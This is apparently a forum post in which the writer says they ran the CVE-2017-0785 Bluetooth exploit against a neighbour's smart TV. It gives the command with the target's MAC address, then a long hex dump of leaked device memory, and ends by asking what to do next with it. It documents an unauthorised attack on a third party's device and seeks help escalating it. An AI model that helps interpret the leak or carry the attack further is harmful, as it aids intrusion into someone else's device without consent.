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Hope someone can help me.......

I used CVE-2017-0785 to exploit my neighbours SmartTV......

It gave me this out --->

sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76
[!] Pwntools does not support 32-bit Python.  Use a 64-bit release.
[+] Exploit: Done
00000000  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
00000020  00 00 00 00  00 00 00 00  00 00 00 00  00 02 00 01  │····│····│····│····│
00000030  b5 69 01 00  b4 8f e9 c0  00 00 00 00  b5 54 fe a3  │·i··│····│····│·T··│
00000040  00 00 00 06  b5 69 39 70  b4 8f e9 e0  b5 60 61 38  │····│·i9p│····│·`a8
00000050  b5 60 61 38  b5 69 39 70  b5 69 39 64  b5 69 5a a4  │·`a8│·i9p│·i9d│·iZ·│
00000060  b4 8f e9 f8  00 00 00 00  b5 69 5a a4  00 00 00 41  │····│····│·iZ·│···A
00000070  b4 8f eb 84  b5 54 e6 f9  b5 60 61 38  b5 69 41 78  │····│·T··│·`a8│·iAx
00000080  b4 8f ea 08  b5 56 e0 4f  b4 8f ea 10  b5 54 57 fd  │····│·V·O│····│·TW·│
00000090  00 00 00 00  b5 69 41 60  b5 56 79 59  b5 69 39 64  │····│·iA`│·VyY│·i9d
000000a0  b4 8f ea 30  00 00 00 18  b4 8f ea d0  b5 54 ca c3  │···0│····│····│·T··│
000000b0  b5 69 41 60  00 00 00 05  b5 60 61 38  b4 8f ea 58  │·iA`│····│·`a8│···X
000000c0  00 00 00 18  b4 8f ea d0  b5 69 39 64  b5 54 d2 bf  │····│····│·i9d│·T··│
000000d0  00 00 00 00  b4 30 04 90  00 00 00 00  42 27 e0 00  │····│·0··│····│B'··│
000000e0  00 00 00 00  b5 69 39 64  00 00 00 08  00 00 00 01  │····│·i9d│····│····│
000000f0  b4 30 04 90  b4 8f ea d0  00 00 00 41  b5 69 39 64  │·0··│····│···A│·i9d│
00000100  b4 8f ea a8  b5 69 41 60  00 00 00 03  b5 69 39 64  │····│·iA`│····│·i9d│
00000110  b5 60 61 38  b4 30 c8 d8  b4 8f ea a0  b5 56 e0 4f  │·`a8│·0··│····│·V·O│
00000120  b4 8f ea a8  b5 56 f6 21  b4 30 c8 d8  41 02 6f 10  │····│·V·!│·0··│A·o·│
00000130  b4 8f ea b8  b5 50 a1 b7  21 00 00 14  0e 0a 24 00  │····│·P··│!···│··$·│
00000140  b5 60 61 38  b5 69 ab 60  b4 8f ea d0  b5 56 e0 4f  │·`a8│·i·`│····│·V·O│
00000150  b4 8f ea d8  b5 69 ab 58  b3 6d d4 87  00 00 00 00  │····│·i·X│·m··│····│
00000160  b4 8f ea f8  00 00 00 02  00 00 00 10  b3 6d f4 b0  │····│····│····│·m··│
00000170  b5 60 61 38  b5 56 d2 45  b4 8f eb 10  00 00 00 00  │·`a8│·V·E│····│····│
00000180  b5 69 5a a4  00 00 00 41  00 00 00 13  b5 54 e6 f9  │·iZ·│···A│····│·T··│
00000190  b4 8f ed 24  b5 69 41 60  b5 60 61 38  b4 8f eb 30  │···$│·iA`│·`a8│···0│
000001a0  00 00 00 19  b4 8f ed 24  00 00 00 41  b5 54 9f 4b  │····│···$│···A│·T·K│
000001b0  00 00 00 00  b5 69 41 60  b5 60 61 38  00 00 00 64  │····│·iA`│·`a8│···d│
000001c0  b4 8f eb 48  b5 56 e0 4f  b4 8f eb 50  b5 56 ef 31  │···H│·V·O│···P│·V·1│
000001d0  b5 60 61 38  b5 69 ab 60  b5 60 61 38  b5 69 ab 60  │·`a8│·i·`│·`a8│·i·`│
000001e0  b4 8f eb 68  b5 56 e0 4f  b4 8f eb 70  b5 54 57 fd  │···h│·V·O│···p│·TW·│
000001f0  b5 69 ab 58  b4 8f ed 24  00 00 00 41  b5 69 ab 10  │·i·X│···$│···A│·i··│
00000200  b4 8f eb 90  00 00 00 0f  b4 8f ed 24  b5 56 82 8b  │····│····│···$│·V··│
00000210  00 02 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
00000220  b5 60 61 38  b5 60 61 38  b3 6e 95 b8  00 00 00 41  │·`a8│·`a8│·n··│···A│
00000230  b4 8f eb c8  00 00 00 41  b3 6e 95 b8  b5 60 61 38  │····│···A│·n··│·`a8│
00000240  b3 6e b5 f0  b5 56 79 25  b5 56 78 bd  b5 69 41 60  │·n··│·Vy%│·Vx·│·iA`│
00000250  b5 69 39 64  00 00 00 14  b4 8f eb e0  b5 54 cd db  │·i9d│····│····│·T··│
00000260  b5 56 79 59  b5 69 39 64  b4 8f eb f0  b5 54 c9 f5  │·VyY│·i9d│····│·T··│
00000270  b5 69 41 60  b5 69 41 60  00 00 00 06  b5 60 61 38  │·iA`│·iA`│····│·`a8│
00000280  b4 8f ec 18  00 00 00 14  b3 6e f6 60  b5 54 d2 13  │····│····│·n·`│·T··│
00000290  b5 54 da cd  b5 69 41 60  00 00 00 00  b5 69 39 64  │·T··│·iA`│····│·i9d│
000002a0  b4 8f ec 38  00 00 00 00  00 00 00 00  b5 60 00 00  │···8│····│····│·`··│
000002b0  b5 60 61 38  b3 6f 16 a0  00 00 00 41  00 00 00 0f  │·`a8│·o··│···A│····│
000002c0  b4 8f ec 68  00 00 00 0f  b3 6f 16 a8  b5 60 61 38  │···h│····│·o··│·`a8│
000002d0  b3 6f 36 d0  b5 54 6e 5d  00 00 00 00  ff ff ff ff  │·o6·│·Tn]│····│····│
000002e0  00 00 00 00  b5 68 13 71  00 00 00 0c  b5 69 39 70  │····│·h·q│····│·i9p│
000002f0  00 00 00 0e  b5 5d 62 84  b5 5d 62 c0  b5 5d 62 e0  │····│·]b·│·]b·│·]b·│
00000300  b5 5d 63 10  b5 5d 63 3c  b5 5d 63 68  00 00 00 41  │·]c·│·]c<│·]ch│···A│
00000310  b3 6c 82 1c  00 00 00 01  00 00 00 00  b3 6c 82 36  │·l··│····│····│·l·6│
00000320  b4 8f ed 24  00 00 00 41  b3 6c 82 36  00 00 00 00  │···$│···A│·l·6│····│
00000330  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
00000340  00 00 00 00  b5 60 61 38  b5 60 61 38  b5 69 39 70  │····│·`a8│·`a8│·i9p│
00000350  b5 69 39 64  b5 69 5a a4  b4 8f ec f0  00 00 00 00  │·i9d│·iZ·│····│····│
00000360  b5 69 5a a4  b4 31 15 07  b5 69 39 70  b5 54 e6 f9  │·iZ·│·1··│·i9p│·T··│
00000370  b5 69 39 64  00 00 00 02  b5 69 5a a4  b4 8f ed 20  │·i9d│····│·iZ·│··· │
00000380  b4 31 15 07  00 00 00 0c  b4 31 15 07  b5 54 ea 59  │·1··│····│·1··│·T·Y│
00000390  00 00 00 00  00 00 00 00  00 00 00 00  41 02 6f 10  │····│····│····│A·o·│
000003a0  b5 5d 88 94  b5 5d 88 5c  b4 8f f8 f0  b5 69 f7 20  │·]··│·]·\│····│·i· │
000003b0  00 00 02 e9  42 2b d0 10  00 00 01 74  00 00 00 00  │····│B+··│···t│····│
000003c0  b4 8f ed 58  00 00 00 00  b4 8f ed 50  00 00 00 81  │···X│····│···P│····│
000003d0  42 2b cc 60  b4 8f ed 60  00 00 00 00  00 00 00 00  │B+·`│···`│····│····│
000003e0  00 00 00 00  b5 69 f7 20  b5 69 f6 d4  00 00 00 00  │····│·i· │·i··│····│
000003f0  b4 8f ed 78  b5 69 f6 b0  00 00 00 00  00 00 ff ff  │···x│·i··│····│····│
00000400  b4 8f ed 98  b4 8f ed 90  b4 8f f8 f0  0e 0a 24 00  │····│····│····│··$·│
00000410  b4 8f ed 98                                         │····││

Who knows what to do now with this Code?

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